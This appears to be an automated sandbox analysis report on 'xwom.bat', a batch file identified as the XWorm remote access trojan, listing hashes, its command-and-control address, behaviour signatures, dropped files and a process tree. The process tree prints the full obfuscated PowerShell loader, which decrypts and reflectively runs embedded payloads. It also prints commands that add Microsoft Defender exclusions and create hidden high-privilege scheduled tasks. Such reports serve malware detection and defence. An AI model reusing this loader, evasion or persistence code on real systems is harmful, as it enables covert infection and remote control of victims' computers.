Analysis

  • max time kernel
    21s
  • max time network
    13s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    19-01-2025 04:27

General

  • Target

    xwom.bat

  • Size

    289KB

  • MD5

    70f8d974c2a88306feb001f1fa941742

  • SHA1

    9af58f49b85b9b0cec9a9aa7341619be9816e11c

  • SHA256

    9474ce66db13f8709d90b965efc25787858533d44f7b2d6aae51939350547748

  • SHA512

    f0e4a5b4fb451f69b1e7bd5171ed8274d27e96f66927ff7ac9761176452e48884daa64cee526570bd07f1034e2cc982713e441f3bc2c3d9a419ddde5b58d8ede

  • SSDEEP

    6144:20eM6eHlpD0EUulZTKIeiUBMQrr3NE4E8/OUW4ncFOBr0iVU:20eMnldZTKIeAh4YUF90x

Malware Config

Extracted

Family

xworm

C2

109.176.252.16:80

109.176.252.16:80:80

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    WinReg32.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xwom.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1356
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:4396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7BQEaj8gKUasQgenzRDJNMLtICUmXa0OCQVFhk5BKw4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sPY+Tf54FmPqKYzuLmFhkw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KRiwI=New-Object System.IO.MemoryStream(,$param_var); $CPetX=New-Object System.IO.MemoryStream; $ZhYGE=New-Object System.IO.Compression.GZipStream($KRiwI, [IO.Compression.CompressionMode]::Decompress); $ZhYGE.CopyTo($CPetX); $ZhYGE.Dispose(); $KRiwI.Dispose(); $CPetX.Dispose(); $CPetX.ToArray();}function execute_function($param_var,$param2_var){ $HVqFo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NSQIj=$HVqFo.EntryPoint; $NSQIj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\xwom.bat';$AERPx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\xwom.bat').Split([Environment]::NewLine);foreach ($oSYKt in $AERPx) { if ($oSYKt.StartsWith(':: ')) { $AeDnM=$oSYKt.Substring(3); break; }}$payloads_var=[string[]]$AeDnM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_721_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_721.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3472
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_721.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3904
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_721.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2960
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2124
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:1956
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7BQEaj8gKUasQgenzRDJNMLtICUmXa0OCQVFhk5BKw4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sPY+Tf54FmPqKYzuLmFhkw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KRiwI=New-Object System.IO.MemoryStream(,$param_var); $CPetX=New-Object System.IO.MemoryStream; $ZhYGE=New-Object System.IO.Compression.GZipStream($KRiwI, [IO.Compression.CompressionMode]::Decompress); $ZhYGE.CopyTo($CPetX); $ZhYGE.Dispose(); $KRiwI.Dispose(); $CPetX.Dispose(); $CPetX.ToArray();}function execute_function($param_var,$param2_var){ $HVqFo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NSQIj=$HVqFo.EntryPoint; $NSQIj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_721.bat';$AERPx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_721.bat').Split([Environment]::NewLine);foreach ($oSYKt in $AERPx) { if ($oSYKt.StartsWith(':: ')) { $AeDnM=$oSYKt.Substring(3); break; }}$payloads_var=[string[]]$AeDnM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3056
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4608
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1096
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WinReg32.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:948
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WinReg32.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1548
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WinReg32" /tr "C:\ProgramData\WinReg32.exe"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2728
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /0
    1⤵
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4508

Network

MITRE ATT&CK Enterprise v15

Downloads

      • C:\ProgramData\WinReg32.exe

        Filesize

        440KB

        MD5

        0e9ccd796e251916133392539572a374

        SHA1

        eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

        SHA256

        c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

        SHA512

        e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        df472dcddb36aa24247f8c8d8a517bd7

        SHA1

        6f54967355e507294cbc86662a6fbeedac9d7030

        SHA256

        e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

        SHA512

        06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        f1fc3cb922137433eba6f5eefaec3f65

        SHA1

        cfcc1550869b819741a0570a60fb1cbb48d8aa50

        SHA256

        b749e695fc8be6e9b974a3f50ba82d591c7dabd4c57d5e6188ef1dcc98a15d7d

        SHA512

        079d7da5764d7ccf62a4fe118180ecd0cabd7452989b0d64c622575ad1f674e244d88a08b4f0470917ad7d5ba24ddb2471332d6361ec9d34ca412ede8d9d690c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        d0a4a3b9a52b8fe3b019f6cd0ef3dad6

        SHA1

        fed70ce7834c3b97edbd078eccda1e5effa527cd

        SHA256

        21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

        SHA512

        1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        59f2e90fbb5fef65ad751465328ef029

        SHA1

        cef3098ae0f919dc883f13f4dbff89489dd96fd3

        SHA256

        d04d16a3f72ce160b8907b09f9abf3900f55acbeb1beec9e8b90f03d956a922f

        SHA512

        ba6dfd7d8dae080e6e7295e3fe48b0f01de2fac65f36dbb0f458e970a3f7220eea913f37db3b2d427718fb1e95b8df6730310437e2f83c77f309a72e3e501016

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        050567a067ffea4eb40fe2eefebdc1ee

        SHA1

        6e1fb2c7a7976e0724c532449e97722787a00fec

        SHA256

        3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e

        SHA512

        341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uh4sib2d.pru.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinReg32.lnk

        Filesize

        677B

        MD5

        09b7256f7a5f13c48064d2d93e85a538

        SHA1

        57025cf5e2f6d6ffe4ea16578acf68209ffe9727

        SHA256

        0d43f30a5592f3e127912e88d75b0cdf4e38b6f3ac33bba45476fde950911fbb

        SHA512

        882fd6125207dd660e1bdcd6d2a71323a2610c6e3fce1249a42568e8751a906ae128a454604afe8856b3a51ab59dbb4d78b5ab4411d48b53a36e2337bc208aa2

      • C:\Users\Admin\AppData\Roaming\startup_str_721.bat

        Filesize

        289KB

        MD5

        70f8d974c2a88306feb001f1fa941742

        SHA1

        9af58f49b85b9b0cec9a9aa7341619be9816e11c

        SHA256

        9474ce66db13f8709d90b965efc25787858533d44f7b2d6aae51939350547748

        SHA512

        f0e4a5b4fb451f69b1e7bd5171ed8274d27e96f66927ff7ac9761176452e48884daa64cee526570bd07f1034e2cc982713e441f3bc2c3d9a419ddde5b58d8ede

      • C:\Users\Admin\AppData\Roaming\startup_str_721.vbs

        Filesize

        115B

        MD5

        6e0a3971056f5f6eef950e313d6171a1

        SHA1

        5c11906df91064547290510d7ccc090d70f80fab

        SHA256

        5cc0fe9afd14be934fcd84affc9e62028b970db959f7e1e3bc6d7c586062cc6e

        SHA512

        b1ac8dc9f7a04a70f623862335c15697b2af4a0d97368532e4773ff437fc80e2e43a52d2bea06325118826b319699ba023b15930322cb2d57eebf0234d47f521

      • memory/1608-0-0x00007FF881773000-0x00007FF881775000-memory.dmp

        Filesize

        8KB

      • memory/1608-14-0x00000262F2090000-0x00000262F20C8000-memory.dmp

        Filesize

        224KB

      • memory/1608-13-0x00000262EFC60000-0x00000262EFC68000-memory.dmp

        Filesize

        32KB

      • memory/1608-12-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

      • memory/1608-11-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

      • memory/1608-10-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

      • memory/1608-48-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

      • memory/1608-49-0x00007FF881773000-0x00007FF881775000-memory.dmp

        Filesize

        8KB

      • memory/1608-50-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

      • memory/1608-9-0x00000262EFC70000-0x00000262EFC92000-memory.dmp

        Filesize

        136KB

      • memory/3056-47-0x0000017ACBF10000-0x0000017ACBF26000-memory.dmp

        Filesize

        88KB

      • memory/3472-16-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

      • memory/3472-29-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

      • memory/3472-25-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

      • memory/3472-26-0x00007FF881770000-0x00007FF882232000-memory.dmp

        Filesize

        10.8MB

      • memory/4508-100-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

      • memory/4508-102-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

      • memory/4508-101-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

      • memory/4508-91-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

      • memory/4508-99-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

      • memory/4508-98-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

      • memory/4508-97-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

      • memory/4508-96-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

      • memory/4508-92-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB

      • memory/4508-90-0x00000285FD8D0000-0x00000285FD8D1000-memory.dmp

        Filesize

        4KB